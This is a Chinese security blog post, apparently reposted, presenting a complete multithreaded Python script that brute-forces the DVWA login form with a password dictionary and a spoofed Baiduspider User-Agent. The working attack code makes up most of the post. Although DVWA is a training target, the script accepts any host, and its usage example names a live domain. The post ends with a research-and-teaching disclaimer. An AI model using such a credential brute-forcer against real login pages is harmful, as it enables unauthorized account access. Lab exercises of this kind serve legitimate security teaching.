[python]DVWA表单破解多线程版

独自等待
独自等待
独自等待
503
文章
0
评论
2017年5月12日01:31:33评论376 views字数 2205阅读7分21秒阅读模式

昨天,我发布了[Python]DVWA表单破解单线程版,看到这个标题想必大家已经知道了,后面肯定还有[Python]DVWA表单破解多线程版,那么恭喜你,答对了,今天给大家分享的就是[Python]DVWA表单破解多线程版。

[Python]DVWA表单破解单线程版请参考:

[python]dvwa表单破解单线程版

python多线程破解DVWA

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
# Date: 2014/8/30
# Created by 独自等待
# 博客 http://www.waitalone.cn/
import sys, time, httplib, urllib, threading, Queue

starttime = time.time()


def usage():
    print '+' + '-' * 50 + '+'
    print '\t\tDVWA表单破解多线程版'
    print '\t Blog:http://www.waitalone.cn/'
    print '\t\t Code BY: 独自等待'
    print '\t\t Time:2014-08-30'
    print '+' + '-' * 50 + '+'
    if len(sys.argv) != 4:
        print "用法: dvwacrack.py 待破解的域名 用户名 密码字典"
        print "实例: dvwacrack.py www.waitalone.cn admin pass.txt"
        sys.exit()


queue = Queue.Queue()
success = []


class multCrackdvwa(threading.Thread):
    "DVWA表单破解函数多线程版本,Code BY:独自等待"

    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            try:
                password = self.queue.get()
                params = urllib.urlencode({'username': username, 'password': password, 'Login': '登陆'})
                headers = {'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Baiduspider'}
                httpClient = httplib.HTTPConnection(host, 80, timeout=10)
                httpClient.request('POST', '/dvwa/login.php', params, headers)
                response = httpClient.getresponse()
                if response.getheader('Location') == 'index.php':
                    sucmsg = '恭喜大爷,密码破解成功!用户名:%s\t密码:%s\n' % (username, password)
                    print sucmsg
                    success.append(sucmsg)
                else:
                    httpClient.close()
            except Exception, msg:
                print '搞毛毛虫,网站都不能访问,请检查!', msg
            self.queue.task_done()


if __name__ == '__main__':
    usage()
    host = sys.argv[1]
    username = sys.argv[2]
    pwdlist = sys.argv[3]
    for i in range(10):
        t = multCrackdvwa(queue)
        t.setDaemon(True)
        t.start()
    pwds = [line.rstrip() for line in open(pwdlist)]
    print '字典加载成功,共有字典%d行!\n' % len(pwds)
    for password in pwds:
        queue.put(password)
    queue.join()
    for x in success:
        result = open('result.txt', 'a+')
        result.write(x)
        result.close()
    print '报告大爷,破解完成,小爷睡觉去了,拜拜喽!\n'
    endtime = time.time()
    print '脚本执行时间:', endtime - starttime, '秒'

本脚本参考了花开、若相惜的多线程网站后台破解。。。

经测试,多线程版本比单线程版本确实节省了不少的时间,如下图:

多线程破解DVWA

PHP+CURL多线程实现的代码请参考如下文章:

CURL单线程破解DVWA登陆密码

CURL多线程破解DVWA登陆密码



from www.waitalone.cn.thanks for it.

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
独自等待
  • 本文由 发表于 2017年5月12日01:31:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [python]DVWA表单破解多线程版https://cn-sec.com/archives/50223.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息